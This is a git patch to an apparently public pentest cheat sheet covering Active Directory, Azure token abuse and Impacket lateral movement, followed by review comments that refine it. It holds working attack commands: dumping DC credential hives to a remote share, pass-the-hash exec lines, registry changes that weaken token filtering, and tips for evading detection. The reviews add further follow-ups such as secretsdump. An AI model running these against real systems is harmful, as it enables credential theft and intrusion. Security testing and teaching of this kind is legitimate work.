From 8442b304c965596366146739728668227f870013 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 15 Feb 2023 17:03:49 +0100 Subject: [PATCH] SMBExec + Refresh & Access Token Azure --- .../Active Directory Attack.md | 3 + .../Cloud - Azure Pentest.md | 118 +++++++++++++----- .../Windows - Using credentials.md | 42 +++++-- 3 files changed, 122 insertions(+), 41 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index a1a3828..8d307d7 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -2966,6 +2966,9 @@ This groups grants the following privileges : $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon') $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"} ``` +* Retrieve SAM,SECURITY and SYSTEM hives + * [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\` + * [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK` ### Abusing Active Directory ACLs/ACEs diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 8170edd..c327ac0 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -3,6 +3,9 @@ ## Summary * [Azure Recon Tools](#azure-recon-tools) +* [Authenticating to the Microsoft Graph API in PowerShell](#authenticating-to-the-microsoft-graph-api-in-powershell) + * [Graph API Refresh Token](#graph-api-refresh-token) + * [Graph API Access Token](#graph-api-access-token) * [Terminology](#terminology) * [Training](#training) * [Enumeration](#enumeration) 
@@ -60,35 +63,6 @@ ## Azure Recon Tools -* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework. - ```powershell - pipenv shell - roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout] - roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa] - roadrecon auth -u test@.onmicrosoft.com -p - roadrecon gather - roadrecon gui - ``` -* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects - ```powershell - # session 1 - backend - pipenv shell - python ssbackend.pyz - - # session 2 - frontend - cd C:\Tools\stormspotter\frontend\dist\spa\ - quasar.cmd serve -p 9091 --history - - # session 3 - collector - pipenv shell - az login -u test@.onmicrosoft.com -p - python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli - - # Web access on http://localhost:9091 - Username: neo4j - Password: BloodHound - Server: bolt://localhost:7687 - ``` * [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound ```powershell # First, retrieve a refresh token (-r) if username/password isn't supported. @@ -98,6 +72,8 @@ $rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1] # Second, launch azurehound collector + ./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." -o output.json + ## Connects on your Azure account using the refresh token provided and the tenant of the account ## and collects every possible objects in contoso.microsoft.com. Results are stored in json ./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com" 
@@ -141,13 +117,42 @@ MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname ``` -* [BloodHoundAD/BARK](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit +* [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit ```ps1 . .\BARK.ps1 $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com" $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com" $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress ``` +* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework. + ```powershell + pipenv shell + roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout] + roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa] + roadrecon auth -u test@.onmicrosoft.com -p + roadrecon gather + roadrecon gui + ``` +* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects + ```powershell + # session 1 - backend + pipenv shell + python ssbackend.pyz + + # session 2 - frontend + cd C:\Tools\stormspotter\frontend\dist\spa\ + quasar.cmd serve -p 9091 --history + + # session 3 - collector + pipenv shell + az login -u test@.onmicrosoft.com -p + python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli + + # Web access on http://localhost:9091 + Username: neo4j + Password: BloodHound + Server: bolt://localhost:7687 + ``` * [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites * 
[**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. ```powershell @@ -208,6 +213,59 @@ $ Create-Backdoor, Execute-Backdoor ``` +## Authenticating to the Microsoft Graph API in PowerShell + +* [Microsoft Applications ID](https://learn.microsoft.com/fr-fr/troubleshoot/azure/active-directory/verify-first-party-apps-sign-in) + +| Name | GUID | +|----------------------------|--------------------------------------| +| Microsoft Azure PowerShell | 1950a258-227b-4e31-a9cf-717495945fc2 | +| Microsoft Azure CLI | 04b07795-8ddb-461a-bbee-02f9e1bf7b46 | +| Portail Azure | c44b4083-3bb0-49c1-b47d-974e53cbdf3c | + + +### Graph API Refresh Token + +Authenticating to the Microsoft Graph API in PowerShell + +```ps1 +$body = @{ + "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2" + "resource" = "https://graph.microsoft.com" # Microsoft Graph API +} +$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" +$Headers=@{} +$Headers["User-Agent"] = $UserAgent +$authResponse = Invoke-RestMethod ` + -UseBasicParsing ` + -Method Post ` + -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" ` + -Headers $Headers ` + -Body $body +$authResponse +``` + +### Graph API Access Token + +This request require getting the Refresh Token. + +```ps1 +$body=@{ + "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2" + "grant_type" = "urn:ietf:params:oauth:grant-type:device_code" + "code" = $authResponse.device_code +} +$Tokens = Invoke-RestMethod ` + -UseBasicParsing ` + -Method Post ` + -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" ` + -Headers $Headers ` + -Body $body +$Tokens +``` + + + ## Terminology > Basic Azure AD terminologies 
diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 549f8ea..04d9580 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -11,6 +11,7 @@ * [Impacket](#impacket) * [PSExec](#psexec) * [WMIExec](#wmiexec) + * [SMBExec](#smbexec) * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [Powershell Remoting Protocol](#powershell-remoting-protocol) @@ -123,13 +124,13 @@ From [fortra/impacket](https://github.com/fortra/impacket) (:warning: renamed to All Impacket's *exec scripts are not equal, they will target services hosted on multiples ports. The following table summarize the port used by each scripts. -| Method | Port Used | -|-------------|---------------------------------------| -| psexec.py | tcp/445 | -| smbexec.py | tcp/445 | -| atexec.py | tcp/445 | -| dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM) | -| wmiexec.py | tcp/135, tcp/445, tcp/50911 (Winmgmt) | +| Method | Port Used | Admin Required | +|-------------|---------------------------------------|----------------| +| psexec.py | tcp/445 | Yes | +| smbexec.py | tcp/445 | No | +| atexec.py | tcp/445 | No | +| dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM) | No | +| wmiexec.py | tcp/135, tcp/445, tcp/50911 (Winmgmt) | Yes | * `psexec`: equivalent of Windows PSEXEC using RemComSvc binary. ```ps1 
@@ -153,15 +154,23 @@ The following table summarize the port used by each scripts. wmiexec.py DOMAIN/username@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 ``` +To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute: +`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1` +To prevent RID 500 from being able to WmiExec or PsExec, execute: +`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1` + + ### PSExec -PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections [snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb) +Instead of uploading `psexeccsv` service binary, it uploads to `ADMIN$` a service binary with an arbitrary name. +PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections ([snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb)) Use a custom binary and service name with : `psexec.py Administrator:Password123@IP -service-name customservicename -remote-binary-name custombin.exe` Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCustom.exe`. You need to update the pipe name to match "Custom_communication" in the line 163 -`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)` +`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)`. Alternatively you can use the fork [ThePorgs/impacket](https://github.com/ThePorgs/impacket/pull/3/files). + ### WMIExec 
@@ -169,6 +178,15 @@ Use a non default share `-share SHARE` to write the output to reduce the detecti By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1` +### SMBExec + +It creates a service with the name `BTOBTO` ([smbexec.py#L59](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L59)) and transfers commands from the attacker in a bat file in `%TEMP/execute.bat` ([smbexec.py#L56](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L56)). + +It will create a new service every time we execute a command. It will also generate an Event 7045. + +By default this command is execute: `%COMSPEC% /Q /c echo dir > \\127.0.0.1\C$\__output 2>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat`, where `%COMSPEC%` points to `C:\WINDOWS\system32\cmd.exe`. + + ## RDP Remote Desktop Protocol :warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors. @@ -216,7 +234,6 @@ Abuse RDP protocol to execute commands remotely with the following commands; ``` - ## Powershell Remoting Protocol ### Powershell Credentials 
@@ -339,5 +356,8 @@ PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) - [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html) -- [Impacket Remote code execution on Windows from Linux by Vry4n_ | Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/) +- [Impacket Remote code execution on Windows from Linux by Vry4n_ - Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/) - [Impacket Exec Commands Cheat Sheet - 13cubed](https://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet.pdf) +- [SMB protocol cheatsheet - aas-s3curity](https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/post-exploitation/lateral-movement/smb-protocol) +- [Windows Lateral Movement with smb, psexec and alternatives - nv2lt](https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to/) +- [PsExec.exe IOCs and Detection - Threatexpress](https://threatexpress.com/redteaming/tool_ioc/psexec/) \ No newline at end of file
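Review bot: in the Backup Operators hunk of `Active Directory Attack.md`, the new bullet "Retrieve SAM,SECURITY and SYSTEM hives" is missing a space after the comma, and it should say where the hives go: both tools make the target DC save the hives through the remote registry to the UNC path you pass, so the `-o \\10.10.10.10\SHARE\` in the BackupOperatorToDA example (and the `\\PATH\To\Dump` in the BackupOperatorToolkit one) has to be a share the DC's machine account can reach and write to, not a local folder on the operator's box. It is also worth naming the privilege in play (SeBackupPrivilege from Backup Operators membership) and adding the follow-up step the reader will want next, e.g. `secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL` on the dumped files.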
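Review bot: the AzureHound block in the `Azure Recon Tools` hunk now shows two collector invocations back to back. The added `./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." -o output.json` is a second copy of the `./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com"` line right under it, and that existing line passes `--tenant` twice with two different values. Keep a single invocation with one `--tenant`, and reuse `$rt` from the `Get-AADIntAccessToken` line above so the example stays consistent with the refresh-token step it follows. Minor: "collects every possible objects" should read "collects every possible object".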
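Review bot: since the ROADTool and StormSpotter blocks are being moved wholesale below BARK, this is the moment to fix their placeholders: `roadrecon auth -u test@.onmicrosoft.com -p` and `az login -u test@.onmicrosoft.com -p` have an empty tenant in the UPN and nothing after `-p`, so they cannot be copied as-is. Match the `user@contoso.onmicrosoft.com` / `MyVeryCoolPassword` convention used in the BARK example just above, and say that `roadrecon auth` with `--refresh-token` accepts the same refresh token the AzureHound and BARK examples obtain, so the three tools can share one authentication step.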
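Review bot: in the new "Authenticating to the Microsoft Graph API in PowerShell" section the subsection titles do not match what the requests do, and the step between them is missing. The first request (`.../common/oauth2/devicecode?api-version=1.0`) returns a device code, not a refresh token: `$authResponse` carries `user_code`, `device_code`, `verification_url`, `expires_in` and `interval`, and the user must open the verification URL and enter the user code before anything else works. The second request (`grant_type = urn:ietf:params:oauth:grant-type:device_code`) is the one that returns both `access_token` and `refresh_token`; until the user has finished signing in it answers with an `authorization_pending` error and has to be retried every `interval` seconds, so "This request require getting the Refresh Token" is wrong (and should be "requires"). Suggest renaming the subsections along the lines of "Request a device code" and "Poll for the access and refresh token", updating the two new Summary anchors to match, adding a line after `$authResponse` such as `Write-Host "Open $($authResponse.verification_url) and enter $($authResponse.user_code)"`, and noting that `$Tokens.refresh_token` is the value the AzureHound `-r` flag above expects. Also the learn.microsoft.com link is the `fr-fr` locale and the table row says "Portail Azure"; use the `en-us` URL and "Azure Portal", and "Microsoft Applications ID" should read "Microsoft application IDs".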
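Review bot: the new "Admin Required" column in the `*exec` table is wrong for `smbexec.py`, `atexec.py` and `dcomexec.py`. smbexec creates a service through the Service Control Manager, atexec creates a scheduled task through the ATSVC interface and dcomexec remotely activates a DCOM object; all three need local administrator rights on the target just like psexec and wmiexec and fail with an access-denied error for a plain user. Either drop the column or set every row to "Yes"; if the intended distinction was something else (for example which scripts need a writable admin share for output), name the column for that. While the table is being touched, `tcp/49751` and `tcp/50911` are examples from the dynamic RPC port range (49152-65535), not fixed ports, and the header should say so.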
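Review bot: two points in the registry and PSExec hunk of `Windows - Using credentials.md`. First, `psexeccsv` is not the name of anything; Sysinternals PsExec uploads `PSEXESVC.exe`, and the sentence should say which tool "it" is (the Impacket script), since the paragraph contrasts it with the Sysinternals binary. Second, the two `reg add` lines are the right way round but need context: both run as an administrator on the target, `LocalAccountTokenFilterPolicy=1` disables remote UAC token filtering so any member of the local Administrators group (not only RID 500) gets a full token over the network, and `FilterAdministratorToken=1` puts the built-in Administrator under Admin Approval Mode so its remote token is filtered as well. Grammar: "local admin accounts performing" should be "to perform". Finally, "in the line 163" is a hard-coded line number that will drift; link the `openPipe(s,tid,r'\RemCom_communicaton',0x12019f)` call with a commit permalink instead.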
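Review bot: in the new SMBExec section the quoted default command drops the caret escapes Impacket uses, so as written it would not produce the batch file the text describes. The script builds `%COMSPEC% /Q /c echo <cmd> ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat`; the `^` is what makes the `>` and `2>&1` land inside `execute.bat` rather than redirect the `echo` itself. Fix the path typo `%TEMP/execute.bat` to `%TEMP%\execute.bat`, change "this command is execute" to "this command is executed", and replace the `smbexec.py#L59` / `#L56` links, which point at `master` and will drift, with permalinks to a commit. For the detection note, say the `7045` is in the System event log and that the service is created and then deleted for every command, which is the per-command pattern a defender can key on.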